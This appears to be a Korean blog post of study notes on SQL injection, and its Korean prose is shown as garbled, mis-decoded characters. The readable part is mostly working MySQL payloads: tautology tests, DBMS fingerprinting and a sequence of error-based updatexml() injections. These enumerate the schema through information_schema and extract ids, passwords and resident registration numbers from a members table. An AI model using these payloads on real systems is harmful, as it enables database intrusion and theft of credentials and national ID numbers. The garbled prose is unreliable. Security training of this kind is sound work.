์ƒˆ์†Œ์‹

์ธ๊ธฐ ๊ฒ€์ƒ‰์–ด

๐Ÿ“  Secure

SQL Injection

  • -
๋ฐ˜์‘ํ˜•

 

SQL ์ธ์ ์…˜ ํ”„๋กœ์„ธ์Šค
1. ์—๋Ÿฌ ์œ ๋ฌด / ์ทจ์•ฝ์  ์ง„๋‹จ

๊ฐ•์ œ๋กœ ์—๋Ÿฌ๋ฅผ ๋ฐœ์ƒ์‹œํ‚ค๋Š” ๋ฐฉ๋ฒ•

 

' ์ž…๋ ฅ > ์—๋Ÿฌ ๋ฐœ์ƒ
'%' or writer like '%'%' or content like '%'%' order by idx desc

SELECT * FROM board WHERE title = '  ';		# SQL๋ฌธ ์˜ˆ์ธก ๊ฐ€๋Šฅ

 

-> ์‘์šฉ

1. ํ‚ค์›Œ๋“œ ๊ฒ€์ƒ‰์—์„œ ์˜ค๋ฅ˜ ๋ฐœ์ƒ

2. url ์ฃผ์†Œ์—์„œ ์˜ค๋ฅ˜ ๋ฐœ์ƒ

3. ์ •๋ ฌ์—์„œ๋„ ์—๋Ÿฌ๊ฐ€ ๋ฐœ์ƒ

-> ์ทจ์•ฝ์  ์ง„๋‹จ

์›น ์„œ๋ฒ„์™€ DB์„œ๋ฒ„ ๊ฐ„์˜ ์ž˜๋ชป๋œ ์ฟผ๋ฆฌ๋ฅผ ๋‚ ๋ ธ์„ ๋•Œ ์ •์ƒ/๋น„์ •์ƒ ๋ฐ˜์‘์ด ๋‚˜์˜ค๊ฒŒ ํ•˜๋Š” ๋ฐฉ๋ฒ•

idx์—์„œ ๋”ํ•˜๊ธฐ ํ˜น์€ ๋นผ๊ธฐ๋ฅผ ํ•ด๋ณธ๋‹ค

3+2๋Š” ์•ˆ๋œ๋‹ค > url ์ธ์ฝ”๋”ฉ์œผ๋กœ ์ธํ•ด + ๊ธฐํ˜ธ๊ฐ€ ๊ณต๋ฐฑ์œผ๋กœ ์ฒ˜๋ฆฌ๋จ
+๋ฅผ ํ•˜๊ธฐ์œ„ํ•ด์„  url ์ธ์ฝ”๋”ฉํ•˜๋ฉด + = %2b์ด๋ฏ€๋กœ 3%2b2๋ฅผ ํ•˜๋ฉด 5๋ฒˆ ๊ธ€๋กœ ์ด๋™ ๊ฐ€๋Šฅ
keyword Input ์นธ์— ' or 1=1 # ์„ searchํ•˜๋ฉด ๋ชจ๋“  ๊ธ€์ด ๋‹ค ๋ณด์ธ๋‹ค
keyword Input ์นธ์— ' or 1=2#์„ search ํ•˜๋ฉด ์•„๋ฌด๋Ÿฐ ๊ธ€ ๊ฒ€์ƒ‰๋„ ๋˜์ง€ ์•Š๋Š”๋‹ค

SELECT * FROM board WHERE title = '  ';			# ๊ธฐ์กด ์ฟผ๋ฆฌ๋ฌธ
SELECT * FROM board WHERE title = '' or 1=1 # ';	# True
SELECT * FROM board WHERE title = '' and 1=2 # ';	# False

keyword Input์นธ์— ' or 1=1 and '%'=' ๋ฅผ ์‚ฌ์šฉํ•˜๋ฉด ์ฃผ์„์ฒ˜๋ฆฌ๊ฐ€ ํ•„์š”ํ•˜์ง€ ์•Š๋‹ค

๋’ค์— ์žˆ๋Š” ๋ฌธ์žฅ์„ ์ฃผ์„์œผ๋กœ ํŒŒ๊ดด์‹œ์ผœ์„œ ์ง„ํ–‰ํ•˜๋Š” ๋ฐฉ๋ฒ• > Terminating Query

๋’ค์— ์žˆ๋Š” ๋ฌธ์žฅ์„ ์‚ด๋ ค์„œ ์ง„ํ–‰ํ•˜๋Š” ๋ฐฉ๋ฒ• > In-line Query

 

2. ํ™˜๊ฒฝ๋ถ„์„

MySQL / Oracle / MsSQL

> ๊ฐ๊ฐ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ํ•จ์ˆ˜๋‚˜ ๋ฉ”ํƒ€ ๋ฐ์ดํ„ฐ๊ฐ€ ๋‹ค๋ฅด๊ธฐ ๋•Œ๋ฌธ์— ํ™˜๊ฒฝ ๋ถ„์„์„ ๊ผญ ํ•ด์ค˜์•ผํ•œ๋‹ค

1. ์—ฐ๊ฒฐ ์—ฐ์‚ฐ์ž

MySQL : ๊ณต๋ฐฑ ex) ' test ' == ' te ' ' st '

Oracle : || ex) ' test ' == ' te ' || ' st '

MsSQL : + ex) ' test ' == ' te ' + ' st '

te' 'st ๋ฅผ ๊ฒ€์ƒ‰ํ–ˆ์„๋•Œ test๋กœ ๊ฒ€์ƒ‰๋œ๋‹ค >> MySQL์ž„์„ ์ถ”์ธก ๊ฐ€๋Šฅ
Oracle ํ•จ์ˆ˜ ์‚ฌ์šฉ ๋ถˆ๊ฐ€๋Šฅ
MsSQL ํ•จ์ˆ˜ ์‚ฌ์šฉ ๋ถˆ๊ฐ€๋Šฅ
๋‚ด๋ฆผ์ฐจ์ˆœ์œผ๋กœ ๊ฒ€์ƒ‰ ๊ฐ€๋Šฅ

2. DBMS์˜ ๊ณ ์œ  ํ•จ์ˆ˜

MySQL : mid(), substr(), substring()

Oracle : substr()

MsSQL : substring()

 

 # test๋ผ๋Š” ๊ธ€์ž์—์„œ 1๋ฒˆ์งธ ๊ธ€์ž์—์„œ 1๊ฐœ๊นŒ์ง€ ์ถœ๋ ฅํ•˜์‹œ์˜ค

substr('test',1,1) = t

 # test๋ผ๋Š” ๊ธ€์ž์—์„œ 3๋ฒˆ์งธ ๊ธ€์ž์—์„œ 2๊ฐœ๊นŒ์ง€ ์ถœ๋ ฅํ•˜์‹œ์˜ค

substr('test', 3, 2) = st

 

3. ๊ณต๊ฒฉ ๊ธฐ๋ฒ• ์„ ํƒ

- Error Based : ' and updatexml (0x0a,concat(0x0a,database()),0x0a) #

- Union Based

- Blind Based

- Time Based

 

์ •๋ณด ์ถ”์ถœ ์†๋„ ์ฐจ์ด

Union > Error >>>>>>> Blind >>>>>>> Time

 

information_schema : ๋ฉ”ํƒ€ ๋ฐ์ดํ„ฐ ์ •๋ณด๋ฅผ ๋ชจ์•„๋†“์€ ๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค

 


4. ๋ฉ”ํƒ€ ๋ฐ์ดํ„ฐ ๋งต ์™„์„ฑ

๊ธฐ๋ณธ์ •๋ณด 3๊ฐ€์ง€ ์ฐพ๊ธฐ

database()

system_user()

version()

 

 ' and updatexml (0x0a,concat(0x0a,(๊ณต๊ฒฉ๊ตฌ๋ฌธ)),0x0a) #

๊ธฐ๋ณธ์ •๋ณด 3๊ฐ€์ง€ ์ฐพ๊ธฐ database()
๊ธฐ๋ณธ์ •๋ณด 3๊ฐ€์ง€ ์ฐพ๊ธฐ database()
system_user()
system_user()
version()
version()

' and updatexml (0x0a,concat(0x0a,system_user()),0x0a) #

๋ฉ”ํƒ€ ๋ฐ์ดํ„ฐ ๋งคํ•‘

SCHEMATA : ํ˜„์žฌ ์‚ฌ์šฉ์ค‘์ธ ๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค ๋ชฉ๋ก

TABLES : ํ˜„์žฌ ์‚ฌ์šฉ์ค‘์ธ ํ…Œ์ด๋ธ” ๋ชฉ๋ก

COLUMNS : ํ˜„์žฌ ์‚ฌ์šฉ์ค‘์ธ ์ปฌ๋Ÿผ ๋ชฉ๋ก

 

๊ฐ€์žฅ ์ฒ˜์Œ์— DB ๋ชฉ๋กํ™”

< ์ˆœ์ฐจ ์ ‘๊ทผ ๋ฐฉ์‹ >

๋งŽ์€ ์‹œ๊ฐ„๊ณผ ํŠธ๋ž˜ํ”ฝ์„ ์†Œ๋ชจํ•˜์ง€๋งŒ ์ค‘์š” ์ •๋ณด๋ฅผ ๋†“์น  ํ™•๋ฅ ์ด ์ ๋‹ค

SELECT * FROM information_schema.schemata

SCHEMA_NAME : ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ด๋ฆ„์„ ๋ชจ์•„๋†“์€ ํ•ญ๋ชฉ
TABLE_SCHEMA๋ผ๋Š” ์ปฌ๋Ÿผ์ด ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ด๋ฆ„ , TABLE_NAME์ด๋ผ๋Š” ์ปฌ๋Ÿผ์ด ํ…Œ์ด๋ธ” ์ด๋ฆ„
TABLE_SCHEMA : ๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค ์ด๋ฆ„ , TABLE_NAME : ํ…Œ์ด๋ธ” ์ด๋ฆ„, COLUMN_NAME : ์ปฌ๋Ÿผ ์ด๋ฆ„

information_schema ํ•ญ๋ชฉ์—์„œ phpmyadmin ์ด๋ผ๋Š” ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค์˜ ๋ฉ”ํƒ€๋ฐ์ดํ„ฐ๋งต์„ ์™„์„ฑ

< ๋น„ ์ˆœ์ฐจ ์ ‘๊ทผ ๋ฐฉ์‹ >

์ ์€ ์‹œ๊ฐ„๊ณผ ํŠธ๋ž˜ํ”ฝ์„ ์†Œ๋ชจํ•˜์ง€๋ง‰ ์ค‘์š” ์ •๋ณด๋ฅผ ๋†“์น  ํ™•๋ฅ ์ด ๋†’๋‹ค

 

SELECT * FROM information_schema.tables WHERE table_name like '%mem%'

 

' and updatexml (0x0a,concat(0x0a,(SELECT SCHEMA_NAME FROM information_schema.schemata )),0x0a) #

 

์„œ๋ธŒ์ฟผ๋ฆฌ : ๋ฐ˜๋“œ์‹œ 1๊ฐœ์˜ ์—ด๊ณผ 1๊ฐœ์˜ ํ–‰๋งŒ ์žˆ์–ด์•ผํ•œ๋‹ค. > limit ์ ˆ์„ ์‚ฌ์šฉํ•œ๋‹ค.

' and updatexml (0x0a,concat(0x0a,(SELECT SCHEMA_NAME FROM information_schema.schemata LIMIT 0,1)),0x0a) #

' and updatexml (0x0a,concat(0x0a,(SELECT SCHEMA_NAME FROM information_schema.schemata LIMIT 0,1)),0x0a) #

' and updatexml (0x0a,concat(0x0a,(SELECT SCHEMA_NAME FROM information_schema.schemata LIMIT 1,1)),0x0a) #

5. ์ •๋ณด ์ถ”์ถœ

' and updatexml (0x0a,concat(0x0a,(SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema='board' LIMIT 0,1)),0x0a) #

' and updatexml (0x0a,concat(0x0a,(SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema='board' LIMIT 1,1)),0x0a) #

' and updatexml (0x0a,concat(0x0a,(SELECT COLUMN_NAME FROM information_schema.columns WHERE table_schema='board' LIMIT 0,1)),0x0a) #

' and updatexml (0x0a,concat(0x0a,(SELECT COLUMN_NAME FROM information_schema.columns WHERE table_schema='board' LIMIT 1,1)),0x0a) #

' and updatexml (0x0a,concat(0x0a,(SELECT COLUMN_NAME FROM information_schema.columns WHERE table_schema='board' LIMIT 2,1)),0x0a) #

' and updatexml (0x0a,concat(0x0a,(SELECT COLUMN_NAME FROM information_schema.columns WHERE table_schema='board' LIMIT 3,1)),0x0a) #
' and updatexml (0x0a,concat(0x0a,(SELECT COLUMN_NAME FROM information_schema.columns WHERE table_name='members' LIMIT 3,1)),0x0a) #

' and updatexml (0x0a,concat(0x0a,(SELECT COLUMN_NAME FROM information_schema.columns WHERE table_schema='board' LIMIT 4,1)),0x0a) #

' and updatexml (0x0a,concat(0x0a,(SELECT id FROM members LIMIT 0,1)),0x0a) #

' and updatexml (0x0a,concat(0x0a,(SELECT id FROM members LIMIT 1,1)),0x0a) #

' and updatexml (0x0a,concat(0x0a,(SELECT password FROM members LIMIT 0,1)),0x0a) #

' and updatexml (0x0a,concat(0x0a,(SELECT password FROM members LIMIT 1,1)),0x0a) #

' and updatexml (0x0a,concat(0x0a,(SELECT jumin FROM members LIMIT 0,1)),0x0a) #
๋ฐ˜์‘ํ˜•

'๐Ÿ“  Secure' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

oracle ํ™˜๊ฒฝ ์„ค์ •  (0) 2022.06.30
UNION SQL INJECTION  (0) 2022.06.30
2022-06-27  (0) 2022.06.28
2022-06-23  (0) 2022.06.28
2022-06-22  (0) 2022.06.28
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.